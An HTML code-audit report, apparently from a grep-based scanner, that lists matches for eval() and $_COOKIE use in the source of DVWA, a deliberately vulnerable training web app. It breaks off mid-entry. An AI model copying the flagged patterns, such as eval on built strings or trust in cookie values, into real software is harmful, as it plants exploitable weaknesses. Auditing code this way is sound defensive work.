<!doctype html>
<html>
<head>
<meta charset='utf-8'>
<title>DVWA</title>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/Primer/3.0.1/css/primer.css'>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/themes/prism-solarizedlight.min.css'>
<style>
/* colors */
/* highlighter helper function */
/* hide the notification headers by default */
header#no-matches,
header#rendering {
display: none;
}
/* applied while vue.js is rendering */
#app[v-cloak] {
/* hide sidebar and "matches" space */
/* display a blankslate notification */
}
#app[v-cloak] aside,
#app[v-cloak] main {
display: none;
}
#app[v-cloak] header#rendering {
display: block;
}
/* applied when no matches are found */
#app.nomatches {
/* hide sidebar and "matches" space */
/* display a blankslate notification */
}
#app.nomatches aside,
#app.nomatches main {
display: none;
}
#app.nomatches header#no-matches {
display: block;
}
/* sidebar */
aside li a[data-severity] {
color: silver;
}
/* sidebar severity filters */
#app.showOk aside a[data-severity=ok] {
color: #4078c0;
}
#app.showOk aside a[data-severity=ok]:hover {
background-color: #4078c0;
color: white;
}
#app.showWarn aside a[data-severity=warn] {
color: orange;
}
#app.showWarn aside a[data-severity=warn]:hover {
background-color: orange;
color: white;
}
#app.showCritical aside a[data-severity=critical] {
color: #bd2c00;
}
#app.showCritical aside a[data-severity=critical]:hover {
background-color: #bd2c00;
color: white;
}
#app.showUnknown aside a[data-severity=unknown] {
color: #767676;
}
#app.showUnknown aside a[data-severity=unknown]:hover {
background-color: #767676;
color: white;
}
/* matches */
#app.showOk div.match[data-severity=ok],
#app.showWarn div.match[data-severity=warn],
#app.showCritical div.match[data-severity=critical],
#app.showUnknown div.match[data-severity=unknown] {
display: block;
}
#app main section[data-show='false'] h2 {
color: silver;
}
#app main section[data-show='false'] div.match {
display: none !important;
/* kludge */
}
#app main section a.show-hide {
cursor: pointer;
float: right;
font-size: small;
font-weight: normal;
}
div.match {
border-left: 1px solid white;
display: none;
/* apply background colors by severity */
/* heading */
/* code blocks */
/* user notes */
}
div.match:hover {
border-left: 1px solid #e5e5e5;
}
div.match[data-severity=ok] {
background-color: #f2f8fa;
/* hide code samples and notes for "ok" severity matches */
}
div.match[data-severity=ok] code,
div.match[data-severity=ok] textarea {
display: none;
}
div.match[data-severity=warn] {
background-color: lightyellow;
}
div.match[data-severity=critical] {
background-color: #ffccbd;
}
div.match span.match-id {
float: left;
}
div.match h3 {
color: darkgray;
font-family: monospace;
font-size: small;
font-weight: normal;
}
div.match h3 span.line-number {
color: #55a532;
font-weight: bold;
}
div.match code {
padding: 1rem;
background-color: #f7f7f7;
display: block;
overflow-x: scroll;
white-space: pre;
}
div.match code span.line-number {
color: #999;
padding-right: 1rem;
}
div.match code span.highlight {
background-color: yellow;
display: inline-block;
min-width: 100%;
}
div.match textarea {
color: #666;
border: 1px solid #efefef;
margin-top: 0.5rem;
width: 100%;
}
/* match severity buttons */
p.severity {
text-align: right;
}
p.severity a {
background-color: white;
border: 1px solid #e5e5e5;
padding: 2px 10px;
}
p.severity a:hover {
cursor: pointer;
text-decoration: none;
}
p.severity a[data-severity=unknown] {
display: none;
color: silver;
}
p.severity a[data-severity=ok] {
color: #4078c0;
}
p.severity a[data-severity=ok]:hover {
border: 1px solid #4078c0;
background-color: #4078c0;
color: white;
}
p.severity a[data-severity=warn] {
color: orange;
}
p.severity a[data-severity=warn]:hover {
border: 1px solid orange;
background-color: orange;
color: white;
}
p.severity a[data-severity=critical] {
color: #bd2c00;
}
p.severity a[data-severity=critical]:hover {
border: 1px solid #bd2c00;
background-color: #bd2c00;
color: white;
}
.match[data-severity=ok] p.severity a[data-severity=ok] {
background-color: #4078c0;
color: white;
border: 1px solid #4078c0;
}
.match[data-severity=warn] p.severity a[data-severity=warn] {
background-color: orange;
color: white;
border: 1px solid orange;
}
.match[data-severity=critical] p.severity a[data-severity=critical] {
background-color: #bd2c00;
color: white;
border: 1px solid #bd2c00;
}
/* print stylesheet */
@media print {
/* hide the navigation */
aside {
display: none;
}
/* go full-width */
main.three-fourths.column {
margin: 0 auto;
width: 100%;
}
/* hide the "show/hide" links */
section h2 a.show-hide {
display: none;
}
/* hide sections marked as "hidden" */
section[data-show='false'] {
display: none;
}
/* match style */
.match {
/* don't break match divs */
/* @BUG: this seems poorly supported in Chrome :( */
break-inside: avoid;
/* hide the scrollbars */
/* hide borders */
}
.match code {
-webkit-print-color-adjust: exact;
overflow-x: hidden;
}
.match textarea {
border: none;
/* hide textareas that contain no notes */
}
.match textarea:placeholder-shown {
display: none;
}
/* hide the "severity" buttons */
.match p.severity a {
display: none;
border: none;
}
/* ... except for one serving as a label */
.match[data-severity='ok'] a[data-severity='ok'],
.match[data-severity='warn'] a[data-severity='warn'],
.match[data-severity='critical'] a[data-severity='critical'],
.match[data-severity='unknown'] a[data-severity='unknown'] {
-webkit-print-color-adjust: exact;
display: inline-block;
}
/* DO show "ok" matches on the PDF */
.match[data-severity='ok'] code,
.match[data-severity='ok'] textarea {
display: block !important;
/* kludge */
}
}
</style>
</head>
<body class='container'>
<header class='blankslate blankslate-clean-background'>
<h1>DVWA</h1>
<p class='text-gray'>20 June 2017, 10:29 AM</p>
</header>
<div
id='app'
class='columns'
:class='{
nomatches : matches.length === 0,
showOk : show.ok,
showWarn : show.warn,
showCritical : show.critical,
showUnknown : show.unknown,
}'
v-cloak>
<!-- "rendering" notice -->
<header id='rendering' class='blankslate'>
<h2>Rendering...</h2>
Large documents may take a moment to render.
</header>
<header id='no-matches' class='blankslate' v-cloak>
<h2>No Matches</h2>
The scanned files match no signatures.
</header>
<aside class='one-fourth column'>
<!-- filetype filter -->
<p class='text-gray'>Filetype:</p>
<ul class='filter-list mb-5'>
<li v-for='pair in filetypes'>
<a
@click='filterFiletype'
:data-filetype='pair[0]'
:class='{ selected: filetype === pair[0] }'
class='filter-item'>
<span class='count'>{{ pair[1] }}</span>
{{ pair[0] }}
</a>
</li>
</ul>
<p class='text-gray'>Severity:</p>
<ul class='filter-list mb-5'>
<li v-for='severity in severities'>
<a
@click='filterSeverity'
:data-severity='severity'
class='filter-item active'>
{{ severity }}
</a>
</li>
</ul>
<!-- match navigation -->
<nav class='menu'>
<span class='menu-heading'>Matches</span>
<a v-once v-for='search in filteredSearches'
:href='"#" + search.search'
class='menu-item'>
<code>{{ search.search }}</code>
<span class='counter'>{{ search.count }}</span>
</a>
</nav>
</aside>
<main class='three-fourths column'>
<!-- match groups -->
<section v-for='group in groups' data-show='true'>
<a :name='group[0]'></a>
<h2 class='border-bottom p-3'>{{ group[0] }}
<a class='show-hide' @click='hideSection'>Hide</a>
</h2>
<!-- matches -->
<matches
v-for='match in group[1]'
:key='match.id'
:match='match'
v-on:annotate='save'
v-on:severity='save'
></matches>
</section>
</main>
</div>
<!-- match template -->
<template id='match'>
<div class='match p-3' :data-severity='match.severity'>
<span class='match-id text-gray'>ID: {{ match.id }}</span>
<p class='severity'>
<a data-severity='unknown'>unknown</a>
<a data-severity='ok' @click='severity("ok")'>ok</a>
<a data-severity='warn' @click='severity("warn")'>warn</a>
<a data-severity='critical' @click='severity("critical")'>critical</a>
</p>
<h3>{{ match.file }}:<span class='line-number'>{{ match.line }}</span></h3>
<code v-html='match.match'></code>
<textarea
placeholder='Notes'
v-model='match.note'
v-on:change='annotate()'>{{ match.note }}</textarea>
</div>
</template>
<script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.2.4/vue.min.js'></script>
<script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.17.4/lodash.min.js'></script>
<script type='text/javascript'>
var filetype = 'all';
var filetypes = [
[
"all",
311
],
[
"js",
1
],
[
"php",
310
]
];
var matches = [
{
"id": 37,
"file": "/home/chris/src/DVWA-master/dvwa/js/dvwaPage.js",
"filetype": "js",
"search": "\\seval\\s*\\(",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">/</span><span class=\"token operator\">*</span> Help popup <span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> function <span class=\"token function\">popUp</span><span class=\"token punctuation\">(</span>URL<span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \tday <span class=\"token operator\">=</span> new <span class=\"token function\">Date</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">5:</span> \tid <span class=\"token operator\">=</span> day<span class=\"token punctuation\">.</span><span class=\"token function\">getTime</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token function\">eval</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"page\"</span> <span class=\"token operator\">+</span> id <span class=\"token operator\">+</span> <span class=\"token string\">\" = window.open(URL, '\"</span> <span class=\"token operator\">+</span> id <span class=\"token operator\">+</span> \"<span class=\"token string\">', '</span>toolbar<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span>scrollbars<span class=\"token operator\">=</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span>location<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span>statusbar<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span>menubar<span class=\"token operator\">=</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span>resizable<span class=\"token operator\">=</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span>width<span class=\"token operator\">=</span><span class=\"token number\">500</span><span class=\"token punctuation\">,</span>height<span class=\"token operator\">=</span><span class=\"token number\">300</span><span class=\"token punctuation\">,</span>left <span class=\"token operator\">=</span> <span class=\"token number\">540</span><span class=\"token punctuation\">,</span>top <span class=\"token operator\">=</span> <span class=\"token number\">250</span>'<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\");</span></span>\n<span class=\"line-number\">7:</span> }\n<span class=\"line-number\">8:</span> \n<span class=\"line-number\">9:</span> <span class=\"token operator\">/</span><span class=\"token operator\">*</span> Form validation <span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> function <span class=\"token function\">validate_required</span><span class=\"token punctuation\">(</span>field<span class=\"token punctuation\">,</span>alerttxt<span class=\"token punctuation\">)</span>",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 14,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$html</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> }\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Valid security levels\n<span class=\"line-number\">20:</span> <span class=\"token variable\">$security_levels</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span><span class=\"token string\">'low'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'high'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'impossible'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">21:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> || !<span class=\"token function\">in_array</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$security_levels</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Set security cookie <span class=\"token keyword\">to</span> impossible <span class=\"token keyword\">if</span> no cookie exists\n<span class=\"line-number\">23:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">in_array</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'default_security_level'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$security_levels</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">24:</span> \t\t<span class=\"token function\">dvwaSecurityLevelSet</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'default_security_level'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">25:</span> \t}\n<span class=\"line-number\">26:</span> \t<span class=\"token keyword\">else</span> {",
"line": 21,
"start": 16,
"end": 27,
"severity": "unknown",
"note": ""
},
{
"id": 15,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">127:</span> \treturn <span class=\"token variable\">$returnArray</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">128:</span> }\n<span class=\"line-number\">129:</span> \n<span class=\"line-number\">130:</span> \n<span class=\"line-number\">131:</span> function <span class=\"token function\">dvwaSecurityLevelGet</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">132:</span> \treturn <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">'impossible'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">133:</span> }\n<span class=\"line-number\">134:</span> \n<span class=\"line-number\">135:</span> \n<span class=\"line-number\">136:</span> function <span class=\"token function\">dvwaSecurityLevelSet</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pSecurityLevel</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">137:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pSecurityLevel</span> <span class=\"token operator\">==</span> <span class=\"token string\">'impossible'</span> <span class=\"token punctuation\">)</span> {",
"line": 132,
"start": 127,
"end": 138,
"severity": "unknown",
"note": ""
},
{
"id": 31,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">60:</span> \t\t<span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$request</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"line-number\">62:</span> \t\t\t<span class=\"token string\">'REQUEST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">63:</span> \t\t\t<span class=\"token string\">'GET'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">64:</span> \t\t\t<span class=\"token string\">'POST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">65:</span> \t\t\t<span class=\"token string\">'COOKIE'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_COOKIE</span></span>\n<span class=\"line-number\">66:</span> \t\t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">67:</span> \n<span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$init</span> <span class=\"token operator\">=</span> IDS_Init<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">init</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/IDS/Config/Config.ini'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">69:</span> \n<span class=\"line-number\">70:</span> \t\t<span class=\"token variable\">$init</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>config<span class=\"token punctuation\">[</span> <span class=\"token string\">'General'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'base_path'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/IDS/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 65,
"start": 60,
"end": 71,
"severity": "unknown",
"note": ""
},
{
"id": 62,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'brute'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> <span class=\"token variable\">$method</span> <span class=\"token operator\">=</span> <span class=\"token string\">'GET'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 90,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">13:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'captcha'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 141,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'csrf'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 172,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'exec'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 198,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'fi'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 235,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$method</span> <span class=\"token operator\">=</span> <span class=\"token string\">'GET'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token keyword\">case</span> <span class=\"token 